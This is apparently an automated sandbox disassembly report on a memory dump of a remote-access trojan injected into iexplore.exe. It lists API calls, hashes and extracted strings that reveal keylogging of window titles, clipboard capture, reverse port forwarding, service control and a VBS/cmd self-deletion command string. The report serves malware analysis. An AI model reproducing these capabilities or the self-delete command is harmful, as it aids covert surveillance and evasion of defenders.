                • Part of subcall function 00450502: _free.LIBCMT ref: 00450567
                • Part of subcall function 00450502: _free.LIBCMT ref: 00450579
                • Part of subcall function 00450502: _free.LIBCMT ref: 0045058B
                • Part of subcall function 00450502: _free.LIBCMT ref: 0045059D
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505AF
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505C1
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505D3
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505E5
                • Part of subcall function 00450502: _free.LIBCMT ref: 004505F7
              • _free.LIBCMT ref: 004512FF
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00451321
              • _free.LIBCMT ref: 00451336
              • _free.LIBCMT ref: 00451341
              • _free.LIBCMT ref: 00451363
              • _free.LIBCMT ref: 00451376
              • _free.LIBCMT ref: 00451384
              • _free.LIBCMT ref: 0045138F
              • _free.LIBCMT ref: 004513C7
              • _free.LIBCMT ref: 004513CE
              • _free.LIBCMT ref: 004513EB
              • _free.LIBCMT ref: 00451403
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
              • String ID:
              • API String ID: 161543041-0
              • Opcode ID: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
              • Instruction ID: 673b37a441ff9bbb7eb6cd98574e5fa8379d72fae64c09c4febd1ea684bb8cd8
              • Opcode Fuzzy Hash: 9bfda5629608ba7fc19c0d50907ac959002cc076efa33527145bad7316b2b0bb
              • Instruction Fuzzy Hash: 0E319E315007009FFB20AA7AD845B5B73E8EF0131AF50851FEC68D7662DF78AD448B59
              APIs
              • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453E2F
              • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453EB2
              • __alloca_probe_16.LIBCMT ref: 00453EEA
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,00000001,00000000,\@E,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F45
              • __alloca_probe_16.LIBCMT ref: 00453F94
              • MultiByteToWideChar.KERNEL32(00000001,00000009,00000001,00000000,00000000,00000000,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F5C
                • Part of subcall function 00446137: HeapAlloc.KERNEL32(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • MultiByteToWideChar.KERNEL32(00000001,00000001,00000001,00000000,00000000,?,?,0045405C,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FD8
              • __freea.LIBCMT ref: 00454003
              • __freea.LIBCMT ref: 0045400F
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocHeapInfo
              • String ID: @"a/$\@E
              • API String ID: 3256262068-3307891709
              • Opcode ID: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
              • Instruction ID: bd5a1837779a5f2dcb5c2ea5aeb828518df7829aba760434011a70bbc407b236
              • Opcode Fuzzy Hash: b82298bc980002c4571abe1a7b6d85811e1f97afd47d25fecd247c7af7e2facf
              • Instruction Fuzzy Hash: E391F472E002069ADB209E65CC42AEFBBF59F09756F14052BFC01E7282D739DD89C768
              APIs
              • __EH_prolog.LIBCMT ref: 00419FB9
              • GdiplusStartup.GDIPLUS(00474ACC,?,00000000), ref: 00419FEB
              • CreateDirectoryW.KERNEL32(00000000,00000000,00000000,0000001A,00000019), ref: 0041A077
              • Sleep.KERNEL32(000003E8), ref: 0041A0FD
              • GetLocalTime.KERNEL32(?), ref: 0041A105
              • Sleep.KERNEL32(00000000,00000018,00000000), ref: 0041A1F4
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Sleep$CreateDirectoryGdiplusH_prologLocalStartupTime
              • String ID: time_%04i%02i%02i_%02i%02i%02i$wnd_%04i%02i%02i_%02i%02i%02i$PG$PG$PG
              • API String ID: 489098229-1431523004
              • Opcode ID: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
              • Instruction ID: 65e100c03f0dda0ba9a952c873ad8774fe275ee1deca45487f64c7c8a8292b0e
              • Opcode Fuzzy Hash: c46b288c88e8fad2cac684537be2f5c8f54ab494b41e10cc9a988c1d5ba90d08
              • Instruction Fuzzy Hash: E7515D70A00215AACB14BBB5C8529ED7BA9AB44308F40403FF509AB1E2EF7C9D85C799
              APIs
                • Part of subcall function 00412850: TerminateProcess.KERNEL32(00000000,pth_unenc,0040F8C8), ref: 00412860
                • Part of subcall function 00412850: WaitForSingleObject.KERNEL32(000000FF), ref: 00412873
                • Part of subcall function 004136F8: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,00000000,004752F0), ref: 00413714
                • Part of subcall function 004136F8: RegQueryValueExA.ADVAPI32(00000000,00000000,00000000,00000000,00000208,?), ref: 0041372D
                • Part of subcall function 004136F8: RegCloseKey.ADVAPI32(00000000), ref: 00413738
              • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 0040D859
              • ShellExecuteW.SHELL32(00000000,open,00000000,00466468,00466468,00000000), ref: 0040D9B8
              • ExitProcess.KERNEL32 ref: 0040D9C4
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Process$CloseExecuteExitFileModuleNameObjectOpenQueryShellSingleTerminateValueWait
              • String ID: """, 0$.vbs$8SG$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$Temp$exepath$open
              • API String ID: 1913171305-3159800282
              • Opcode ID: 279071eae946bdd40fb6924cb46543fc9ddc869a8d415c4fcc4de1c8856fe3fb
              • Instruction ID: 6fc8d312854778a25908ca85050b1cee1951ef16e4956e50e312a563d71e527c
              • Opcode Fuzzy Hash: 279071eae946bdd40fb6924cb46543fc9ddc869a8d415c4fcc4de1c8856fe3fb
              • Instruction Fuzzy Hash: 0C413A719001195ACB15FA62DC56DEEB778AF50309F10007FB10AB61E2EF785E4ACA98
              APIs
              • connect.WS2_32(?,?,?), ref: 004048E0
              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A00
              • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000), ref: 00404A0E
              • WSAGetLastError.WS2_32 ref: 00404A21
                • Part of subcall function 0041B4EF: GetLocalTime.KERNEL32(00000000), ref: 0041B509
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CreateEvent$ErrorLastLocalTimeconnect
              • String ID: Connection Failed: $Connection Refused$TLS Authentication Failed$TLS Error 1$TLS Error 2$TLS Error 3$TLS Handshake... |
              • API String ID: 994465650-2151626615
              • Opcode ID: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
              • Instruction ID: c5d57dbf39bf42eeb7f1fe8451fa1a1ddda5cb55b73798f96fdafd5064c5310c
              • Opcode Fuzzy Hash: 99cb689bb5f18c3443efc10de2b69162055e835058a5c35f32943c28cb679500
              • Instruction Fuzzy Hash: 3E41E8B47406016BD61877BA8D1B53E7A15AB81304B50017FE60267AD3EB7D9C108BDF
              APIs
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free
              • String ID:
              • API String ID: 269201875-0
              • Opcode ID: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
              • Instruction ID: d910990a8472ee08c0279d8077499983e41ff25138a9859a729e4309013b5263
              • Opcode Fuzzy Hash: 47079874d6611f76b22abc1c1892e8562d414d23f3395fd45a7677fdf32a9ec5
              • Instruction Fuzzy Hash: E2C17476D40204AFEB20DBA9CC83FDE77B8AB19705F14015AFE05EB283D6B49D458798
              APIs
                • Part of subcall function 004558A9: CreateFileW.KERNEL32(00000000,00000000,?,00455C84,?,?,00000000,?,00455C84,00000000,0000000C), ref: 004558C6
              • GetLastError.KERNEL32 ref: 00455CEF
              • __dosmaperr.LIBCMT ref: 00455CF6
              • GetFileType.KERNEL32(00000000), ref: 00455D02
              • GetLastError.KERNEL32 ref: 00455D0C
              • __dosmaperr.LIBCMT ref: 00455D15
              • CloseHandle.KERNEL32(00000000), ref: 00455D35
              • CloseHandle.KERNEL32(?), ref: 00455E7F
              • GetLastError.KERNEL32 ref: 00455EB1
              • __dosmaperr.LIBCMT ref: 00455EB8
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
              • String ID: H
              • API String ID: 4237864984-2852464175
              • Opcode ID: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
              • Instruction ID: f4290dc4267d91ba683862cdaabef3013db21248f4240db41616def06e578eae
              • Opcode Fuzzy Hash: ad10cc44415123364ccf3ab0f87a2b5b2deaae059395c87e8052164914e7d7f7
              • Instruction Fuzzy Hash: D5A155329106049FDF19AF68DC617BE3BA0EB06325F14415EEC11EB392CB398D5ACB59
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free
              • String ID: \&G$\&G$`&G
              • API String ID: 269201875-253610517
              • Opcode ID: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
              • Instruction ID: 0b3297c67b001fbc5a9f4fbe1fd197d652097ca420ae28a40b4f72db8b3ed5d1
              • Opcode Fuzzy Hash: 97c3add27e511c4221db80506819b16e682529302af84ee57927f6cd57728be0
              • Instruction Fuzzy Hash: 77610475900204AFDB20CFA9C882B9ABBF4EF05315F14416BED58EB342D774AD458B98
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID:
              • String ID: 65535$udp
              • API String ID: 0-1267037602
              • Opcode ID: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
              • Instruction ID: ff24d6befd6f0703c902a6165bd45161ed4db0fb5f75d2635e7e580b9b2721aa
              • Opcode Fuzzy Hash: c855b19cc43d9bec36cd86ac5f012ace8f0d54e169e32fa1a21da6d4488bf9b2
              • Instruction Fuzzy Hash: EF51E7756093019FDB209B58E9057BB37A4AFC4755F08082FF881973A1E76DCCC1865E
              APIs
              • __Init_thread_footer.LIBCMT ref: 0040AD38
              • Sleep.KERNEL32(000001F4), ref: 0040AD43
              • GetForegroundWindow.USER32 ref: 0040AD49
              • GetWindowTextLengthW.USER32(00000000), ref: 0040AD52
              • GetWindowTextW.USER32(00000000,00000000,00000000), ref: 0040AD86
              • Sleep.KERNEL32(000003E8), ref: 0040AE54
                • Part of subcall function 0040A636: SetEvent.KERNEL32(?,?,00000000,0040B20A,00000000), ref: 0040A662
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Window$SleepText$EventForegroundInit_thread_footerLength
              • String ID: [${ User has been idle for $ minutes }$]
              • API String ID: 911427763-3954389425
              • Opcode ID: cdcb862763e0f4fcf2b8f963fbf39a1c29f84f6dab9d3eba07931eb85ffe7d43
              • Instruction ID: 3d5ee5432c15115af2c0f1375ae13a0ba8112eb59c463c5c733e63bb31497985
              • Opcode Fuzzy Hash: cdcb862763e0f4fcf2b8f963fbf39a1c29f84f6dab9d3eba07931eb85ffe7d43
              • Instruction Fuzzy Hash: 6D51B1316043419BD314FB21D846AAE7796AB84308F50093FF586A22E2EF7C9D45C69F
              APIs
              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A892
              • GetLastError.KERNEL32(?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A89F
              • __dosmaperr.LIBCMT ref: 0043A8A6
              • MultiByteToWideChar.KERNEL32(?,00000000,00000050,000000FF,00000000,00000000,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8D2
              • GetLastError.KERNEL32(?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A8DC
              • __dosmaperr.LIBCMT ref: 0043A8E3
              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,000000FF,00000000,?,00000000,00000000,?,?,?,?,?,?,00401D55,?), ref: 0043A926
              • GetLastError.KERNEL32(?,?,?,?,?,?,00401D55,?,00000050,%Y-%m-%d %H.%M,00000000), ref: 0043A930
              • __dosmaperr.LIBCMT ref: 0043A937
              • _free.LIBCMT ref: 0043A943
              • _free.LIBCMT ref: 0043A94A
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharErrorLastMultiWide__dosmaperr$_free
              • String ID:
              • API String ID: 2441525078-0
              • Opcode ID: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
              • Instruction ID: 785efe6d9c8e3fffb8b85045f967b8474775cb8629fdf0d32462ae01257f7f2e
              • Opcode Fuzzy Hash: ad6d2cb2e677ca1b0a2e36bb2f761ff70c692d274a08f618d4296a8b89361871
              • Instruction Fuzzy Hash: FF31F57140420AFFDF01AFA5CC45DAF3B68EF09325F10021AF950662A1DB38CD21DB6A
              APIs
              • MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044ACA3
              • __alloca_probe_16.LIBCMT ref: 0044ACDB
              • MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,0042DD01,?,?,?,0044AE9A,00000001,00000001,?), ref: 0044AD29
              • __alloca_probe_16.LIBCMT ref: 0044ADC0
              • WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 0044AE23
              • __freea.LIBCMT ref: 0044AE30
                • Part of subcall function 00446137: HeapAlloc.KERNEL32(00000000,0043529C,?,?,00438847,?,?,00000000,?,?,0040DE62,0043529C,?,?,?,?), ref: 00446169
              • __freea.LIBCMT ref: 0044AE39
              • __freea.LIBCMT ref: 0044AE5E
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: ByteCharMultiWide__freea$__alloca_probe_16$AllocHeap
              • String ID: @"a/
              • API String ID: 2597970681-2936340451
              • Opcode ID: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
              • Instruction ID: b5b01290aead076256688b5938d42e4b2a7c64905c3dece0b68445a47d4ef5f6
              • Opcode Fuzzy Hash: 12305b3b87d107202002273903900b71ffd2ccf102546581680d8e37d1659883
              • Instruction Fuzzy Hash: 1F513A72680206AFFB258F64CC41EBF77AAEB44714F24462EFC14D6240EB38DC60875A
              APIs
              • SetEvent.KERNEL32(?,?), ref: 004054BF
              • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 0040556F
              • TranslateMessage.USER32(?), ref: 0040557E
              • DispatchMessageA.USER32(?), ref: 00405589
              • HeapCreate.KERNEL32(00000000,00000000,00000000,00000074,00474F78), ref: 00405641
              • HeapFree.KERNEL32(00000000,00000000,0000003B,0000003B,?,00000000), ref: 00405679
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Message$Heap$CreateDispatchEventFreeTranslatesend
              • String ID: CloseChat$DisplayMessage$GetMessage
              • API String ID: 2956720200-749203953
              • Opcode ID: 0ec610aa23bc8968f635cbdc579f4487b555635578f2c1e20c1b908516ec0d6c
              • Instruction ID: c1940132788662b917c5ec79ff16bb55de46c7435784779dc5fc992d72e4b12f
              • Opcode Fuzzy Hash: 0ec610aa23bc8968f635cbdc579f4487b555635578f2c1e20c1b908516ec0d6c
              • Instruction Fuzzy Hash: CE41A171604701ABCB14FB75DC5A86F37A9AB85704F40093EF916A36E1EF3C8905CB9A
              APIs
              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,00456FFF), ref: 00455F27
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: DecodePointer
              • String ID: @"a/$acos$asin$exp$log$log10$pow$sqrt
              • API String ID: 3527080286-2037995204
              • Opcode ID: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
              • Instruction ID: ff4fc8d1aadbe784407353d8516796ad37925c88dabf63da6293f70e8270e0de
              • Opcode Fuzzy Hash: 629998c7ca290600fade91f32205cb7004f8bc569fe6c3e827db03ba52e3cc78
              • Instruction Fuzzy Hash: 16519F71900909CBCF10CF58E9485BEBBB0FF49306FA14197D841A73A6DB399D298B1E
              APIs
                • Part of subcall function 00417F2C: __EH_prolog.LIBCMT ref: 00417F31
              • WaitForSingleObject.KERNEL32(00000000,000000FF,00000070,004660A4), ref: 00417DDC
              • CloseHandle.KERNEL32(00000000), ref: 00417DE5
              • DeleteFileA.KERNEL32(00000000), ref: 00417DF4
              • ShellExecuteExA.SHELL32(0000003C,00000000,00000010,?,?,?), ref: 00417DA8
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: CloseDeleteExecuteFileH_prologHandleObjectShellSingleWaitsend
              • String ID: 0VG$0VG$<$@$Temp
              • API String ID: 1704390241-2575729100
              • Opcode ID: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
              • Instruction ID: cfce1e327495ca125f9f778a73892d1ad62a3a088d665d9de3c725e9e650d499
              • Opcode Fuzzy Hash: 80039bebc9300f329d7d4246b0ce8421c0d0be0a5475c1be6c4e1aa994d609e9
              • Instruction Fuzzy Hash: 0E415F319002099BCB14FB62DC56AEE7775AF40318F50417EF506764E1EF7C1A8ACB99
              APIs
              • OpenClipboard.USER32 ref: 00416941
              • EmptyClipboard.USER32 ref: 0041694F
              • CloseClipboard.USER32 ref: 00416955
              • OpenClipboard.USER32 ref: 0041695C
              • GetClipboardData.USER32(0000000D), ref: 0041696C
              • GlobalLock.KERNEL32(00000000), ref: 00416975
              • GlobalUnlock.KERNEL32(00000000), ref: 0041697E
              • CloseClipboard.USER32 ref: 00416984
                • Part of subcall function 00404AA1: send.WS2_32(?,00000000,00000000,00000000), ref: 00404B36
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Clipboard$CloseGlobalOpen$DataEmptyLockUnlocksend
              • String ID: !D@
              • API String ID: 2172192267-604454484
              • Opcode ID: 0fd2c747e19719d3901cedb71c0bc3d115524066eb5b30ae97a07fd7f06fdd7e
              • Instruction ID: 305b70c8a6b081cbeb1fc088e42579eafb4add048c4ccd3ac1cf7446a02d8759
              • Opcode Fuzzy Hash: 0fd2c747e19719d3901cedb71c0bc3d115524066eb5b30ae97a07fd7f06fdd7e
              • Instruction Fuzzy Hash: CC015E31214301DFC714BB72DC09AAE77A5AF88742F40047EF906821E2DF38CC44CA69
              APIs
              • CreateFileMappingW.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 00413417
              • MapViewOfFile.KERNEL32(00000000,00000004,00000000,00000000,00000000), ref: 00413425
              • GetFileSize.KERNEL32(?,00000000), ref: 00413432
              • UnmapViewOfFile.KERNEL32(00000000), ref: 00413452
              • CloseHandle.KERNEL32(00000000), ref: 0041345F
              • CloseHandle.KERNEL32(?), ref: 00413465
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: File$CloseHandleView$CreateMappingSizeUnmap
              • String ID:
              • API String ID: 297527592-0
              • Opcode ID: 9dc00c8a60334515187db9ff0d24d0a84bd7fe6fbacb43bfca38b95c80b710c8
              • Instruction ID: 9e0538afe5582c7c3c7070a3da709670e2bb39b60280b40541f30be5467d1837
              • Opcode Fuzzy Hash: 9dc00c8a60334515187db9ff0d24d0a84bd7fe6fbacb43bfca38b95c80b710c8
              • Instruction Fuzzy Hash: ED41E631108305BBD7109F25DC4AF6B3BACEF89726F10092AFA14D51A2DF38DA40C66E
              APIs
              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000011,00000000,00000001,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB1C
              • OpenServiceW.ADVAPI32(00000000,00000000,000F003F,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB33
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB40
              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB4F
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB60
              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A486,00000000), ref: 0041AB63
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Service$CloseHandle$Open$ControlManager
              • String ID:
              • API String ID: 221034970-0
              • Opcode ID: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
              • Instruction ID: 6fbe0b082825830d9e24babaefac53afed48758aa8e56b4d18e4903ff4329a9c
              • Opcode Fuzzy Hash: f803f1007c82734b6722f6408504697e53103f3d97c358fc3be63c7478a3d497
              • Instruction Fuzzy Hash: 41114C71901218AFD711AF64DCC4DFF3B7CDB42B62B000036FA05D2192DB289C46AAFA
              APIs
              • _free.LIBCMT ref: 00448135
                • Part of subcall function 00446782: HeapFree.KERNEL32(00000000,00000000,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?), ref: 00446798
                • Part of subcall function 00446782: GetLastError.KERNEL32(?,?,00450C6F,?,00000000,?,00000000,?,00450F13,?,00000007,?,?,0045145E,?,?), ref: 004467AA
              • _free.LIBCMT ref: 00448141
              • _free.LIBCMT ref: 0044814C
              • _free.LIBCMT ref: 00448157
              • _free.LIBCMT ref: 00448162
              • _free.LIBCMT ref: 0044816D
              • _free.LIBCMT ref: 00448178
              • _free.LIBCMT ref: 00448183
              • _free.LIBCMT ref: 0044818E
              • _free.LIBCMT ref: 0044819C
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorFreeHeapLast
              • String ID:
              • API String ID: 776569668-0
              • Opcode ID: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
              • Instruction ID: 63500befab30bf138fa449b3e81d3956d19e40097f86fc95f12732a98ce5ff4f
              • Opcode Fuzzy Hash: 27d76b13a5ecae076ca6598a5b1433465caaf67949f0bdc0fbde8a5d49186781
              • Instruction Fuzzy Hash: C211B67A500508BFEB01EF96C842CDD3BA5FF05359B0240AAFA588F222DA35DF509BC5
              APIs
                • Part of subcall function 00448215: GetLastError.KERNEL32(00000020,?,0043A7F5,?,?,?,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B), ref: 00448219
                • Part of subcall function 00448215: _free.LIBCMT ref: 0044824C
                • Part of subcall function 00448215: SetLastError.KERNEL32(00000000,0043F9A8,?,?,00000020,00000000,?,?,?,0042DD01,0000003B,?,00000041,00000000,00000000), ref: 0044828D
                • Part of subcall function 00448215: _abort.LIBCMT ref: 00448293
              • _memcmp.LIBVCRUNTIME ref: 00445423
              • _free.LIBCMT ref: 00445494
              • _free.LIBCMT ref: 004454AD
              • _free.LIBCMT ref: 004454DF
              • _free.LIBCMT ref: 004454E8
              • _free.LIBCMT ref: 004454F4
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: _free$ErrorLast$_abort_memcmp
              • String ID: @"a/$C
              • API String ID: 1679612858-129303509
              • Opcode ID: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
              • Instruction ID: 551747f29a431029642ca2aca46be5bbca0cbe6c77a4b2ed9ddfbf6361621c56
              • Opcode Fuzzy Hash: 9a230522b66ee103f0b5d02c6619ea6d7647dc78be8ff38f2db07545005a246d
              • Instruction Fuzzy Hash: B2B13975A016199BEB24DF18C884BAEB7B4FF08308F5045EEE949A7351E774AE90CF44
              APIs
              Strings
              Memory Dump Source
              • Source File: 00000002.00000002.2465257129.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_2_2_400000_iexplore.jbxd
              Yara matches
              Similarity
              • API ID: Eventinet_ntoa
              • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse$NG
              • API String ID: 3578746661-3604713145
              • Opcode ID: edfe6bbaccddfd4ec4880ebb48090ea4337a39fe1da7faa544ccad2506e54bec
              • Instruction ID: 71dfdc03858149a45142756d2b421c0b7bbb6d70992310a40494c7f1f0681c69
              • Opcode Fuzzy Hash: edfe6bbaccddfd4ec4880ebb48090ea4337a39fe1da7faa544ccad2506e54bec
              • Instruction Fuzzy Hash: 0051C131A042015BC614FB36C91AAAE37A5AB85344F40453FF906A76F1EF7C8985C7DE
              APIs
